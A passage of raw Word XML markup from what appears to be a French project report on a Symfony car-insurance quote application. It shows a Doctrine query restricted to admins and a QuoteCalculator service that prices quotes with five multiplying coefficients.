          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F12084"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s.user</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'u'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0879373B"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'u'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D488CA8"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q.vehicle</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5348C1AD"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'v'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293AEFFA"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q.formula</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55151366"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'f'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24961822"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leftJoin</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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s.documents</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'</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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'d'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D288F4B"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addSelect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'd'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080DF9E8" w14:textId="77777777" w:rsidR="0006208E" w:rsidRPr="00CE5980" w:rsidRDefault="0006208E" w:rsidP="0006208E">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getQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B38DB9A" w14:textId="77777777" w:rsidR="0006208E" w:rsidRPr="00555B5E" w:rsidRDefault="0006208E" w:rsidP="0006208E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>getResult</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED48F6E" w14:textId="66AAE965" w:rsidR="003A6B7F" w:rsidRPr="00555B5E" w:rsidRDefault="0006208E" w:rsidP="0006208E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8F3C95" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="4114273A" w14:textId="53DCA81F" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="0006208E">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L'absence de clause WHERE retourne toutes les souscriptions. L'accès à cette méthode est restreint au contrôleur admin, lui-même protégé par l'attribut </w:t>
      </w:r>
      <w:r w:rsidR="00325BC5" w:rsidRPr="00790E86">
        <w:rPr>
          <w:color w:val="117A02" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidR="00325BC5" w:rsidRPr="00790E86">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00325BC5" w:rsidRPr="0006208E">
        <w:rPr>
          <w:color w:val="A66500"/>
        </w:rPr>
        <w:t>IsGranted</w:t>
      </w:r>
      <w:r w:rsidR="00325BC5" w:rsidRPr="00790E86">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00325BC5" w:rsidRPr="00790E86">
        <w:rPr>
          <w:color w:val="A33E03" w:themeColor="accent3"/>
        </w:rPr>
        <w:t>'ROLE_ADMIN'</w:t>
      </w:r>
      <w:r w:rsidR="00325BC5" w:rsidRPr="00790E86">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00325BC5" w:rsidRPr="00790E86">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00325BC5">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D31A2BA" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="343C9E6D" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4" w:rsidP="00325BC5">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc233817778"/>
      <w:r>
        <w:t>6.3 Développement des composants métier côté serveur</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="149681CF" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00325BC5">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les services de l'application encapsulent la logique métier en dehors des contrôleurs. Symfony les injecte automatiquement par </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>autowiring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dans les contrôleurs et autres services qui en ont besoin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFE9D3E" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="7EE33274" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00325BC5">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc233817779"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t>Calcul du prix estimé</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="6D1391BC" w14:textId="597A2109" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00325BC5">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>QuoteCalculator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> contient l'intégralité de la logique de tarification. Sa méthode </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getPrice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> applique cinq coefficients multiplicateurs au prix de base de la formule choisie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CAD468" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="4B612F7F" w14:textId="77777777" w:rsidR="00325BC5" w:rsidRPr="00325BC5" w:rsidRDefault="00325BC5" w:rsidP="00325BC5">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QuoteCalculator.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6A6807B5" w14:textId="77777777" w:rsidR="00325BC5" w:rsidRPr="00325BC5" w:rsidRDefault="00325BC5" w:rsidP="00325BC5">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>public</w:t>
      </w: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00FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>getPrice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Quote </w:t>
      </w:r>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$quote</w:t>
      </w:r>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FC8C29"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A99DFD3"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basePrice</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getFormula</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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getbasePrice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2CA72C"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vehicleYear</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getVehicle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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getVehicleYear</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58163732"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$formula</w:t>
      </w:r>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getFormula</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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getName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67506EE0" w14:textId="460283A2" w:rsidR="00325BC5" w:rsidRDefault="00325BC5" w:rsidP="00325BC5">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:ind w:right="-1039"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>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$model</w:t>
      </w:r>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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>modelRepo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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findOneBy</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A31515"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'name'</w:t>
      </w:r>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00E974B9">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getVehicle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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getModel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09481796" w14:textId="77777777" w:rsidR="00325BC5" w:rsidRPr="00325BC5" w:rsidRDefault="00325BC5" w:rsidP="00325BC5">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13BA6EEE"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seniorityCoef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getSeniorityCoef</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getLicenseYear</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723E54FC"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ageCoef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getAgeCoef</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getBirthDate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4F2E0C" w14:textId="7A40E11F" w:rsidR="00325BC5" w:rsidRPr="00325BC5" w:rsidRDefault="00325BC5" w:rsidP="00E974B9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:ind w:right="-472"/>
        <w:jc w:val="both"/>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vehicleValueCoef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getVehicleValueCoef</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vehicleYear</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E974B9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$model</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getPurchasePrice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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$formula</w:t>
      </w:r>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00E974B9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A66EC7"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durationCoef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getDurationCoef</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getDuration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF4C220" w14:textId="77777777" w:rsidR="00325BC5" w:rsidRDefault="00325BC5" w:rsidP="00325BC5">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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bonusMalusCoef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$this</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getBonusMalusCoef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$quote</w:t>
      </w:r>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>getBonusMalus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B412FC2" w14:textId="77777777" w:rsidR="00325BC5" w:rsidRPr="00325BC5" w:rsidRDefault="00325BC5" w:rsidP="00325BC5">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BC82CCD" w14:textId="77777777" w:rsidR="00325BC5" w:rsidRDefault="00325BC5" w:rsidP="00325BC5">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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estimatedPrice</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basePrice</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seniorityCoef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vehicleValueCoef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ageCoef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durationCoef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> *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bonusMalusCoef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECBBB28" w14:textId="77777777" w:rsidR="00E974B9" w:rsidRPr="00325BC5" w:rsidRDefault="00E974B9" w:rsidP="00325BC5">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="596B92E2" w14:textId="77777777" w:rsidR="00325BC5" w:rsidRPr="00325BC5" w:rsidRDefault="00325BC5" w:rsidP="00325BC5">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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00FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00325BC5">
        <w:rPr>
